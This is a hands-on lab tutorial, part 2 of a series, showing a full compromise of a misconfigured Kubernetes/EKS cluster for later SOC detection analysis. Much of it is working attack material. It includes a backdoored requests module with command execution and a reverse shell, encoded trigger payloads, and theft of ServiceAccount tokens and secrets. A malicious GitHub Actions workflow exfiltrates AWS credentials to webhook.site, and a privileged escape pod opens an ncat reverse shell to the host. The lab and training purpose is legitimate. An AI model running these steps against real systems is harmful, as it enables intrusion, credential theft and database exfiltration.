Hands-on lab: Full Kubernetes compromise, what will your SOC do about it? (Part 2)
Part 2: Attacking Kuby infrastructure
In this part, we’ll attack the Kuby infrastructure. As mentioned in the previous part, the infrastructure is highly misconfigured, yet realistic. When there’s no admission controller validating what your DevOps teams deploy, things like this can happen, and the weakest link in the chain always gets exploited.
We will have a main scenario that will lead to the exfiltration of the Flasky and the Treasure databases. Let’s see if we can avoid triggering any GuardDuty alert.
- Initial access through the backdoored Flask application
- Discovery of our environment
- Accessing the first Flasky database
- Elevating our privileges through GitHub CI/CD
Initial access through the backdoored Flask application
First, we have to find out on which endpoint the Flasky application is listening.
aws-vault exec ADMIN_ROLE -- kubectl get svc
Let’s imagine we set up a beautiful domain name instead, and that it is listening on a traditional HTTP port. For the lab, it doesn’t matter, but that will be our starting point as attackers.
You can curl it and see how it behaves.
# Attacker machine
$ curl http://XXX.eu-west-3.elb.amazonaws.com:6389/
{
"API healthcheck": "OK"
}
Let’s study this application a bit more. You should have forked the repository in the previous part: https://github.com/Kerberosse/flasky.
This is a dockerized Flask application that was backdoored during its supply chain. It is a somewhat contrived initial access vector, an excuse to get a foothold in our Kubernetes cluster, even though the threat of uncontrolled code reaching production is real (e.g. here, here or here).
The legitimate requests module was swapped for a certain requets module (note the typo), which here can be found locally in the same repository.
The call to the requests.get() function inside the route handled by the data() function redirects to the backdoored get() function below.
- The URL passed as argument is first URL-decoded, then parsed
- If the parsed URL contains a GET parameter called 2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870, its value (which can be an array) is passed to a subprocess.Popen() constructor, which ultimately executes a command under the web server process
- If the parsed URL contains a GET parameter called 875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7, its value (which can be an array) is used to spawn a reverse shell towards an attacker-controlled IP:port
- For any other request, the legitimate requests.get() function is called with the URL as argument
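To make the mechanics concrete, here is a minimal sketch of what such a get() function could look like, reconstructed from the behaviour described above; the actual requets module in the repository may differ in its details.
# Sketch reconstructed from the description above, not the real requets code
import socket
import subprocess
from urllib.parse import unquote, urlparse, parse_qs

import requests as real_requests  # the legitimate library, used for normal calls

CMD_PARAM = "2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870"
SHELL_PARAM = "875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7"

def get(url, **kwargs):
    # 1. URL-decode, then parse the query string
    decoded = unquote(url)
    params = parse_qs(urlparse(decoded).query)

    if CMD_PARAM in params:
        # 2. Execute an arbitrary command under the web server process
        proc = subprocess.Popen(params[CMD_PARAM],
                                stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        out, err = proc.communicate()
        return f"{out}++{err}"

    if SHELL_PARAM in params:
        # 3. Reverse shell towards an attacker-controlled IP:port
        ip, port = params[SHELL_PARAM][0], int(params[SHELL_PARAM][1])
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((ip, port))
        subprocess.Popen(["/bin/bash", "-i"],
                         stdin=s.fileno(), stdout=s.fileno(), stderr=s.fileno())
        return "OK"

    # 4. Otherwise, behave like the legitimate requests.get()
    return real_requests.get(decoded, **kwargs)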
The “vulnerable” endpoint is dynamic and takes a URL slug ip_address that is passed to the data() function as a variable. However, in Flask a slug can’t contain GET parameters: they are stripped before reaching the view. For instance, the following payload will not trigger our backdoor.
# Attacker machine
# Those commands will produce the same output
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8?\
2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870=id"
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8
The people who backdoored this application thought about that! That’s why, as we saw earlier, the URL is URL-decoded before processing. We can URL-encode our special characters so that Flask doesn’t interpret them as GET parameters; once inside our malicious function, they are URL-decoded, revealing our payload.
# Attacker machine
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8%3F\
2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870%3Did"
"b'uid=0(root) gid=0(root) groups=0(root)\\n'++b''"
Discovery of our environment
We can then have fun and perform some reconnaissance as root.
# Attacker machine
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8%3F\
2c595d8fb8b1534227ffa680234aabd14a978cfb7c840494521f5d22babc9870%3Dmount"
"b'overlay on / type overlay (rw,relatime,seclabel, \
lowerdir=/var/lib/containerd/io.containerd.snapshotter.v1.overlayfs"
...
"(rw,nosuid,nodev,noexec,relatime,seclabel,size=65536k)\\ntmpfs on \
/run/secrets/kubernetes.io/serviceaccount type tmpfs"
The mount command showed us a few things.
- The container runtime is containerd, and not Docker: this is the default in the recent EKS-optimized AMIs
- We are in a Kubernetes Pod, and the ServiceAccount token is mounted inside the container, which is also the default
We want to know which permissions this token has, so we need to find a way to contact the Kubernetes API server with it.
Let’s first use the second feature of our backdoor, the reverse shell. This is something that is likely to trigger an alert if you have a good EDR solution, since a web server shouldn’t be spawning an interactive bash session. We could have spent more time fine-tuning our backdoor to natively interact with the OS through Python primitives, but this is a lab and I don’t have time for this!
# Attacker machine (listener 1)
$ nc -nlv 0.0.0.0 14573
# Attacker machine (client)
$ curl "http://XXX.eu-west-3.elb.amazonaws.com:6389/ipinfo/8.8.8.8\
%3F875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7\
%3D<LISTENER_IP>%26875199797f91a807f6c7a7693fad7eea1be4eaf3139afe7088468548746b83f7\
%3D<LISTENER_PORT>"
# Attacker machine (listener 1)
$ whoami
root
Back to our goal: the EKS API is exposed through a public endpoint in this lab, but the attacker doesn’t know that yet with their current rights. The easiest way in is the internal endpoint, accessible from within our VPC. Let’s authenticate to it with the ServiceAccount token, mounted under /var/run/secrets/kubernetes.io/serviceaccount/token, and see which permissions it has.
# Attacker machine (listener 1)
$ echo $KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS
172.20.0.1:443
# The CA used to authenticate the API server (TLS) can also be found under
# /var/run/secrets/kubernetes.io/serviceaccount/ca.crt if you want
$ curl -k -H "Authorization: Bearer `cat /var/run/secrets/kubernetes.io/serviceaccount/token`" -X GET https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS/api
{
"kind": "APIVersions",
"versions": [
"v1"
],
"serverAddressByClientCIDRs": [
{
"clientCIDR": "0.0.0.0/0",
"serverAddress": "ip-XXX.eu-west-3.compute.internal:443"
}
]
}
Let’s now install kubectl to ease our communication with this API server.
# Attacker machine (listener 1)
$ cd $(mktemp -d)
$ pwd
/tmp/tmp.mhFFQJSMJY
$ curl -LO https://dl.k8s.io/release/$(curl -Ls https://dl.k8s.io/release/stable.txt)/bin/linux/amd64/kubectl
$ chmod +x ./kubectl
$ ./kubectl config set-cluster cfc --server=https://$KUBERNETES_SERVICE_HOST:$KUBERNETES_SERVICE_PORT_HTTPS --certificate-authority=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
$ ./kubectl config set-context cfc --cluster=cfc
$ ./kubectl config set-credentials user --token=`cat /var/run/secrets/kubernetes.io/serviceaccount/token`
$ ./kubectl config set-context cfc --user=user
$ ./kubectl config use-context cfc
$ ./kubectl auth can-i --list
Warning: the list may be incomplete: webhook authorizer does not support user rule resolution
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
namespaces [] [] [get watch list]
pods [] [] [get watch list]
secrets [] [] [get watch list]
[/.well-known/openid-configuration/] [] [get]
[/.well-known/openid-configuration] [] [get]
[/api/*] [] [get]
[/api] [] [get]
[/apis/*] [] [get]
[/apis] [] [get]
[/healthz] [] [get]
[/healthz] [] [get]
[/livez] [] [get]
[/livez] [] [get]
[/openapi/*] [] [get]
[/openapi] [] [get]
[/openid/v1/jwks/] [] [get]
[/openid/v1/jwks] [] [get]
[/readyz] [] [get]
[/readyz] [] [get]
[/version/] [] [get]
[/version/] [] [get]
[/version] [] [get]
[/version] [] [get]
That’s a lot of suspicious commands. If there were an EDR, or if outbound traffic from the Pod were restricted, I would have been in trouble. Then again, I could have built a SOCKS proxy into the backdoor from the start to keep all my tooling at home; this topic will be discussed in the next part, where I’ll share a few detection ideas for more advanced scenarios.
Accessing the first Flasky database
This ServiceAccount seems to have a lot of rights, but read-only ones. Let’s explore the cluster…
# Attacker machine (listener 1)
$ ./kubectl get namespaces
NAME STATUS AGE
default Active 5h
kube-node-lease Active 5h
kube-public Active 5h
kube-system Active 5h
runners Active 4h18m
treasure Active 4h19m
$ ./kubectl get secrets
NAME TYPE DATA AGE
flasky-secret Opaque 3 4h28m
$ ./kubectl get secrets flasky-secret -o json
{
"apiVersion": "v1",
"data": {
"flasky_password": "Rmxhc2t5OWYwYzAzZjIzZTUyZWRiNmRhMTcwMGMzMTEzZDE1MzJiZGFjNGJiNjgxNTYxOTgyNmU4NThkNjZiMjE1ODViMg==",
"flasky_user": "Zmxhc2t5",
"root_password": "VG9wU2VjcmV0OWYwYzAzZjIzZTUyZWRiNmRhMTcwMGMzMTEzZDE1MzJiZGFjNGJiNjgxNTYxOTgyNmU4NThkNjZiMjE1ODViMg=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"flasky-secret\",\"namespace\":\"default\"},\"stringData\":{\"flasky_password\":\"Flasky9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\",\"flasky_user\":\"flasky\",\"root_password\":\"TopSecret9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\"},\"type\":\"Opaque\"}\n"
},
"creationTimestamp": "2024-06-22T08:46:05Z",
"name": "flasky-secret",
"namespace": "default",
"resourceVersion": "6481",
"uid": "5e8927c7-f12e-4f03-9845-3479df76f9d0"
},
"type": "Opaque"
}
$ ./kubectl get secrets -n runners
NAME TYPE DATA AGE
github-pat Opaque 1 4h25m
kuby-runner-set-7d446b46-listener Opaque 1 4h25m
kuby-runner-set-7d446b46-listener-config Opaque 1 4h25m
sh.helm.release.v1.arc.v1 helm.sh/release.v1 1 4h26m
sh.helm.release.v1.kuby-runner-set.v1 helm.sh/release.v1 1 4h26m
$ ./kubectl get secrets github-pat -o json -n runners
{
"apiVersion": "v1",
"data": {
"github_token": "XXX"
},
"kind": "Secret",
"metadata": {
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"github-pat\",\"namespace\":\"runners\"},\"stringData\":{\"github_token\":\"XXX\"},\"type\":\"Opaque\"}\n"
},
"creationTimestamp": "2024-06-22T08:49:35Z",
"name": "github-pat",
"namespace": "runners",
"resourceVersion": "7201",
"uid": "e991825b-04c2-4347-b10e-4d9da23a99ac"
},
"type": "Opaque"
}
$ ./kubectl get secrets -n treasure
NAME TYPE DATA AGE
treasure-secret Opaque 3 4h27m
$ ./kubectl get secrets -n treasure -o json
{
"apiVersion": "v1",
"items": [
{
"apiVersion": "v1",
"data": {
"root_password": "U3VwZXJUcmVhc3VyZTlmMGMwM2YyM2U1MmVkYjZkYTE3MDBjMzExM2QxNTMyYmRhYzRiYjY4MTU2MTk4MjZlODU4ZDY2YjIxNTg1YjI=",
"treasure_password": "VHJlYXN1cmU5ZjBjMDNmMjNlNTJlZGI2ZGExNzAwYzMxMTNkMTUzMmJkYWM0YmI2ODE1NjE5ODI2ZTg1OGQ2NmIyMTU4NWIy",
"treasure_user": "dHJlYXN1cmVfdXNlcg=="
},
"kind": "Secret",
"metadata": {
"annotations": {
"kubectl.kubernetes.io/last-applied-configuration": "{\"apiVersion\":\"v1\",\"kind\":\"Secret\",\"metadata\":{\"annotations\":{},\"name\":\"treasure-secret\",\"namespace\":\"treasure\"},\"stringData\":{\"root_password\":\"SuperTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\",\"treasure_password\":\"Treasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2\",\"treasure_user\":\"treasure_user\"},\"type\":\"Opaque\"}\n"
},
"creationTimestamp": "2024-06-22T08:48:20Z",
"name": "treasure-secret",
"namespace": "treasure",
"resourceVersion": "6916",
"uid": "6111bd2f-75f4-47ce-9325-1ec75f54a3ed"
},
"type": "Opaque"
}
],
"kind": "List",
"metadata": {
"resourceVersion": ""
}
}
We have a lot of secrets! Let’s see if we can connect to the Flasky database with those credentials.
# Attacker machine (listener 1)
$ ./kubectl describe pods flasky-db-56d5ffdb7b-9mbwg
Name: flasky-db-56d5ffdb7b-9mbwg
Namespace: default
Priority: 0
Service Account: default
Node: ip-10-0-1-121.eu-west-3.compute.internal/10.0.1.121
Start Time: Sat, 22 Jun 2024 08:46:05 +0000
Labels: app=flasky-db
pod-template-hash=56d5ffdb7b
Annotations: <none>
Status: Running
IP: 10.0.1.108
$ apt install netcat-traditional
$ nc -zvw 1 10.0.1.108 3306
10-0-1-108.flasky-db.default.svc.cluster.local [10.0.1.108] 3306 (mysql) open
Great (not surprising)! One out of two. What about the other one?
# Attacker machine (listener 1)
$ ./kubectl describe pods -n treasure
Name: treasure-db-5ff5d5c765-m8vx9
Namespace: treasure
Priority: 0
Service Account: default
Node: ip-10-0-1-121.eu-west-3.compute.internal/10.0.1.121
Start Time: Sat, 22 Jun 2024 08:48:20 +0000
Labels: app=treasure-db
pod-template-hash=5ff5d5c765
Annotations: <none>
Status: Running
IP: 10.0.1.103
$ nc -zvw 1 10.0.1.103 3306
# Timeout! D'oh!
We’re not really surprised, as there’s a NetworkPolicy preventing us from reaching pods inside the treasure namespace; a sketch of what such a policy could look like is shown below. We will have to find a way to elevate our privileges.
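For reference, a policy producing this behaviour could look like the following; the actual manifest was applied when building the lab and isn’t reproduced here, so the name and selectors are guesses.
# Hypothetical sketch: deny ingress to treasure pods, except from the same namespace
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: treasure-isolation
  namespace: treasure
spec:
  podSelector: {}            # applies to every pod in the treasure namespace
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector: {}        # only traffic from pods inside treasure is allowed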
Elevating our privileges through GitHub CI/CD
Let’s see what we can do with that GitHub Personal Access Token. But first, we need to find out which account it belongs to! There are multiple ways, such as checking the .git directory in the Flasky application, but we’ll instead look at the configuration of those runners, which must also reference the repository they’re attached to.
# Attacker machine (listener 1)
$ ./kubectl describe pods kuby-runner-set-7d446b46-listener -n runners
Name: kuby-runner-set-7d446b46-listener
Namespace: runners
Priority: 0
Service Account: kuby-runner-set-7d446b46-listener
Node: ip-10-0-1-121.eu-west-3.compute.internal/10.0.1.121
Start Time: Sat, 22 Jun 2024 08:49:40 +0000
Labels: actions.github.com/organization=XXX
actions.github.com/repository=flasky
actions.github.com/scale-set-name=kuby-runner-set
actions.github.com/scale-set-namespace=runners
app.kubernetes.io/component=runner-scale-set-listener
app.kubernetes.io/instance=kuby-runner-set
app.kubernetes.io/managed-by=Helm
app.kubernetes.io/name=kuby-runner-set
app.kubernetes.io/part-of=gha-runner-scale-set
app.kubernetes.io/version=0.9.2
helm.sh/chart=gha-rs-0.9.2
Annotations: <none>
Status: Running
IP: 10.0.1.123
Great! We can reconstruct the repository location from the organization and repository labels. Let’s try to authenticate to it, but not from the Pod as it might be monitored, and list the Actions secrets.
# Attacker machine (client)
$ curl -H "Accept: application/vnd.github+json" \
-H "Authorization: Bearer ghp_XXX" \
-H "X-GitHub-Api-Version: 2022-11-28" \
https://api.github.com/repos/XXX/flasky/actions/secrets
{
"total_count": 5,
"secrets": [
{
"name": "AWS_ACCESS_KEY_ID",
"created_at": "2024-06-21T17:03:45Z",
"updated_at": "2024-06-22T09:00:05Z"
},
{
"name": "AWS_REGION_ID",
"created_at": "2024-06-21T17:04:09Z",
"updated_at": "2024-06-21T17:04:09Z"
},
{
"name": "AWS_ROLE_TO_ASSUME",
"created_at": "2024-06-21T17:05:24Z",
"updated_at": "2024-06-21T17:05:24Z"
},
{
"name": "AWS_SECRET_ACCESS_KEY",
"created_at": "2024-06-21T17:03:58Z",
"updated_at": "2024-06-22T09:00:18Z"
},
{
"name": "K8S_EKS_NAME",
"created_at": "2024-06-21T17:05:39Z",
"updated_at": "2024-06-21T17:05:39Z"
}
]
}
Juicy! These are most likely the credentials for the IAM role the runners assume to perform actions on the Kubernetes cluster (remember, we authenticate through the EKS API only). Runners usually have a lot of rights since they are the ones driving the CI/CD pipeline. But the API doesn’t return the secrets’ values, so we’ll have to find a workaround.
We know workflows can access them, and we may have the rights to add a custom one that would exfiltrate them. Let’s do it: clone the repository locally with the GitHub PAT and add a workflow.
# Attacker machine (client)
$ git clone https://github.com/XXX/flasky.git
Username: XXX
Password: ghp_XXX
$ cd flasky
$ vi .github/workflows/haha.yaml
The exfiltration is set up at the 4th step of the job. Here I use https://webhook.site, which provides a convenient HTTPS listener that will receive our credentials in the POST body, as defined by my workflow.
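The actual haha.yaml isn’t reproduced here, but a minimal sketch of such an exfiltration workflow could look like this; the runs-on label matches the scale set name seen earlier, and the whole job is collapsed into a single step for brevity.
# Illustrative sketch only, not the exact workflow used in the lab
on: push
jobs:
  build:
    runs-on: kuby-runner-set        # the self-hosted runner scale set
    steps:
      - name: Exfiltrate Actions secrets
        env:
          KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
          SECRET: ${{ secrets.AWS_SECRET_ACCESS_KEY }}
          REGION: ${{ secrets.AWS_REGION_ID }}
          ROLE: ${{ secrets.AWS_ROLE_TO_ASSUME }}
          EKS: ${{ secrets.K8S_EKS_NAME }}
        run: |
          curl -s -X POST https://webhook.site/XXX \
            --data-urlencode "key_id=$KEY_ID" \
            --data-urlencode "secret=$SECRET" \
            --data-urlencode "region=$REGION" \
            --data-urlencode "role=$ROLE" \
            --data-urlencode "eks=$EKS"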
Let’s push this back to our repository.
# Attacker machine (client)
git add .github/workflows/haha.yaml
# Let's commit with the run-name of the legitimate workflow.
# Since our malicious one doesn't define a run-name, the display name
# in the GUI will be the commit message!
git commit -m "Build & deploy Flasky"
git push https://github.com/XXX/flasky.git
After a few minutes, you should have received all the secrets on your HTTPS listener. You can see how your custom workflow is doing by checking its status in the Actions tab of your repository. Notice that the GUI displays the same run title for both the legitimate workflow and the malicious one.
Great, we have the runners’ IAM credentials. We know we can only access the cluster either through the EKS public endpoint from an allowed public IP address, or internally from within the VPC. We’ll use those credentials from within the compromised Pod.
Back to our reverse shell, let’s set up our AWS credentials.
# Attacker machine (listener 1)
$ mkdir /root/.aws
$ cd /root/.aws
We will download the credentials and config files from our previously set up webhook, by setting a custom response. If you use https://webhook.site, click on Edit in your webhook and set up the credentials file first.
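The credentials file simply holds the exfiltrated key pair under the default profile; the values below are placeholders for what your listener received.
[default]
aws_access_key_id=AKIAXXXXXXXXXXXXXXXX
aws_secret_access_key=XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX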
# Attacker machine (listener 1)
$ curl -o credentials https://webhook.site/XXX
For the config file, you can use the following content.
[default]
region=eu-west-3
output=json
[profile user]
role_arn=arn:aws:iam::XXX:role/kuby-GHRole
source_profile=default
region=eu-west-3
output=json
# Attacker machine (listener 1)
$ curl -o config https://webhook.site/XXX
$ export AWS_DEFAULT_PROFILE=user
Let’s now set up the AWS CLI.
# Attacker machine (listener 1)
$ cd ..
$ curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
$ unzip awscliv2.zip
$ ./aws/install --bin-dir /usr/local/bin --install-dir /usr/local/aws-cli
# Authenticate & update the kubeconfig
$ aws eks update-kubeconfig --name kuby
Your AWS credentials are now set and you’re ready to use kubectl with the GitHub runner IAM role. Go back to where you installed kubectl previously (it should be a temporary directory).
# Attacker machine (listener 1)
$ ./kubectl auth can-i --list
Resources Non-Resource URLs Resource Names Verbs
selfsubjectreviews.authentication.k8s.io [] [] [create]
selfsubjectaccessreviews.authorization.k8s.io [] [] [create]
selfsubjectrulesreviews.authorization.k8s.io [] [] [create]
deployments.apps [] [] [get list watch update create patch delete]
statefulsets.apps [] [] [get list watch update create patch delete]
configmaps [] [] [get watch list update create patch delete]
persistentvolumeclaims [] [] [get watch list update create patch delete]
pods/exec [] [] [get watch list update create patch delete]
pods/log [] [] [get watch list update create patch delete]
pods/portforward [] [] [get watch list update create patch delete]
pods [] [] [get watch list update create patch delete]
secrets [] [] [get watch list update create patch delete]
services [] [] [get watch list update create patch delete]
Okay, we can do basically everything. The simplest approach is to retrieve the database content through kubectl exec.
# Attacker machine (listener 1)
$ ./kubectl get pods -n treasure
NAME READY STATUS RESTARTS AGE
treasure-db-5ff5d5c765-m8vx9 1/1 Running 0 6h5m
$ ./kubectl exec treasure-db-5ff5d5c765-m8vx9 -n treasure -- mysql \
-u treasure_user -pTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2 \
-e "show databases;"
Database
information_schema
performance_schema
treasure
$ ./kubectl exec treasure-db-5ff5d5c765-m8vx9 -n treasure -- mysql \
-u treasure_user -pTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2 \
-e "use treasure; show tables;"
Tables_in_treasure
users
$ ./kubectl exec treasure-db-5ff5d5c765-m8vx9 -n treasure -- mysql \
-u treasure_user -pTreasure9f0c03f23e52edb6da1700c3113d1532bdac4bb6815619826e858d66b21585b2 \
-e "use treasure; select * from users;"
id username email password
1 admin admin@treasure.local 44b68f9bd1c1569c13c9938c2cc7189c4bbe433c0e08f1042e49eedf5b4b1b6b
2 paul paul@flasky.local 9d1f6ff2a1b98f02ee11fa9f26b40df9a2aad227d3f181e56be0b29210cfeb2a
3 pietra pietra@flasky.local c932581bce88b1d474cc2f62b06497f691a8890969431716b251671e8ae1e8d4
4 irina irina@flasky.local 9c5f9940d768ff35a2a936b2a17be905a80c1bda4771e4d0c08f4ca3e043bf53
5 wilson wilson@flasky.local 05e12663b9a18e052ccb547be8e3e5d45e2996f57836936953d1aa66625d47cb
6 john john@flasky.local 8ffebb31eb69b530b6691d24cb1124d166293f321150d6f255ee2be0cf81dd64
7 tyler tyler@flasky.local d295ca77498a9cdc09c852f39acf96822773adb52396d2ba6dc54bc4a4bb9bf5
8 lisa lisa@flasky.local 618f28b220987aed20593c3363392c583fb3097e4357145bdecab2af31a78dd8
Voilà!
Let’s say we want to go a bit further and get code execution on the worker node itself (a.k.a. pod escape). With those rights, we can easily create a custom privileged pod with bind mounts to the host filesystem. This is the classic way out with that many privileges. Let’s do it, just for fun.
In your webhook, change the response content to the pod manifest (a minimal sketch is shown below). We’re going to create a pod that launches a reverse shell towards us with new privileges. Set the first argument of the entrypoint to your attacker IP, and the second one to the port you’re listening on.
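This is a sketch of what that manifest could look like; the image name is a placeholder for any image shipping ncat, and the exact file used in the lab may differ slightly.
# Hypothetical reconstruction of the privileged escape pod
apiVersion: v1
kind: Pod
metadata:
  name: escape
  namespace: default
spec:
  containers:
  - name: escape
    image: <IMAGE_WITH_NCAT>                # assumption: provides /usr/local/bin/ncat
    command: ["/usr/local/bin/ncat"]
    args: ["<ATTACKER_IP>", "<LISTENER_PORT>", "-e", "/bin/bash"]
    securityContext:
      privileged: true                      # full privileges on the node
    volumeMounts:
    - name: host-root
      mountPath: /host                      # host filesystem, used later with chroot /host
  volumes:
  - name: host-root
    hostPath:
      path: /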
Prepare a new listener in your attacker machine, and create the pod.
# Attacker machine (listener 2)
$ nc -nlv 0.0.0.0 65000
# Attacker machine (listener 1)
$ curl -o pod.yaml https://webhook.site/XXX
$ ./kubectl apply -f pod.yaml
# Attacker machine (listener 2)
$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 15:07 ? 00:00:00 /usr/local/bin/ncat XXX 65000 -e /bin/bash
root 8 1 0 15:07 ? 00:00:00 /bin/bash
root 9 8 0 15:09 ? 00:00:00 ps -ef
$ chroot /host /bin/bash
$ ps -ef
UID PID PPID C STIME TTY TIME CMD
root 1 0 0 08:14 ? 00:00:14 /usr/lib/systemd/systemd --switched-root --system --deserialize=32
root 2 0 0 08:14 ? 00:00:00 [kthreadd]
root 3 2 0 08:14 ? 00:00:00 [rcu_gp]
root 4 2 0 08:14 ? 00:00:00 [rcu_par_gp]
root 5 2 0 08:14 ? 00:00:00 [slub_flushwq]
...
By chroot-ing a bash shell into the mounted host filesystem, we can list all the processes of the worker node.
This is the end of our attack. Feel free to imagine all kinds of variations; I expect more articles will come, confronting attack vectors with their associated detection strategies (in Kubernetes, or in more classical environments).
In the next part, we’ll move on to the incident response side with what we have.
- What did Amazon GuardDuty natively detect?
- What can be retrieved from the kill chain by analyzing all relevant logs?
- What could have been improved?